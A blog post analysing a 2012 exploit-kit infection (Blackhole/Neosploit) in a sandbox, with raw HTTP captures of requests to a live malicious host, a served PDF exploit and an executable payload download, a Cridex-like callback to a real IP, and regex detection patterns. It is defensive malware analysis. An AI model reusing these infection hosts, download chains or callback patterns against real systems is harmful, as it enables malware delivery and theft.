I continue my analysis of exploits URL and disk artifacts. This website was reported as a blackhole exploit., but some aspects of the network traffic are consistent with Neosploit, including the user agent strings involved.
In this case, I grabbed the following exploit URL.
hxxp://www.i-democracy.ru/letter.htm
Once my sandbox got hit, I started to notice some patterns from all these attacks, remembering back to the FakeAV infection I looked at September 15th. Deeper inspection shows what looks like a usable pattern.
First, in my infection the dialect of the exploit kit was very similar in pattern to the infection method of the FakeAV and matched other traffic observed.
GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx
HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx HTTP/1.1
accept-encoding: pack200-gzip,gzip
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m
HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Notice the differentiation in the User Agent, the initial Content-Type which is missing the subsequent requests. The initial user agent string is consistent with observed Neosploit and the binary download is consistent with java exploits where the user agent string is straight Java.
Exploit Send PDF Despite Other Exploits Avialable
What was also of interest is that this sandbox has multiple exploits available, but unlike the blackhole I analyzed on September 9th (where Media Player was exploited), this exploit kit sent a PDF file.Next, I noticed the inline attachment pdf served by nginx server. Also, see this URLquery report
GET /forum/links/column.php?zbyg=0735020b0b&dcgdi=4b&ayj=3307093738070736060b&okn=02000200020002 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://sonatanamore.ru:8080/forum/links/column.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: sonatanamore.ru:8080
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 07 Oct 2012 05:08:50 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 13581
Content-Disposition: inline; filename=a17ee.pdf
%PDF-1.6
%....
52 0 obj<</Length 12345/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream
Immediately followed by the binary download, made by Java Version 29.
GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 07 Oct 2012 05:09:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 07 Oct 2012 12:42:41 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 92160
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
URL Pattern Analysis:
The most interesting point I could find in my URL analysis of the samples I saw was that they all contained ? 2 to 10 lowercase characters = followed by hexidecimal in 10 character increments, with as many as 70 characters (10, 20 and 70 to be precise). The secondary parameter in the URL is always shorter.I believe there is a good enough pattern for url regex here, once pre-qualified for user agent java or no referrer or both.
Generic detection: \.php\?\w{2,10}\=[0-9a-f]{10,70}\&\w{2,10}\=\w.*\&\w{2,10}\=\w
Callback
This particular sample had a cridix-like rootkit callout with what looked like a spyeye sample.On the disk, the file names (again) were wgsdgsdgdsgsd.exe. as well as a KB<randomnumber>.exe.POST /mx/5/A/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 41.168.5.140:8080
Content-Length: 350
Connection: Keep-Alive
Cache-Control: no-cache
Generic Detection: \w{2}\/\w.*\/in\/$
This user agent is identified in multiple malware samples as post infection activity and the URL string is consistent with Cridex rootkit, while the malware sample was consistent with Spyeye.
References:
http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-August/015413.htmlhttp://malwr.com/analysis/7d663d3f7d93ba2b32d456b861686501/
http://spamalysis.wordpress.com/2012/03/05/spammed-goo-gl-links/
http://www.spamhaus.org/news/article/680/
http://stopmalvertising.com/rootkits/analysis-of-cridex.html
http://fortknoxnetworks.blogspot.com/2012/09/blackhole-disk-artifacts-complete-dump.html
http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html
http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze
http://blog.fireeye.com/research/2010/06/neosploit_notes.html
http://wepawet.iseclab.org/view.php?hash=b7cb2a698f35209f9b70eb7361e1162f&type=js
http://jsunpack.jeek.org/?report=b2f98dbcf33f74b9d99b6a6d975f9e4fb26289b5
No comments:
Post a Comment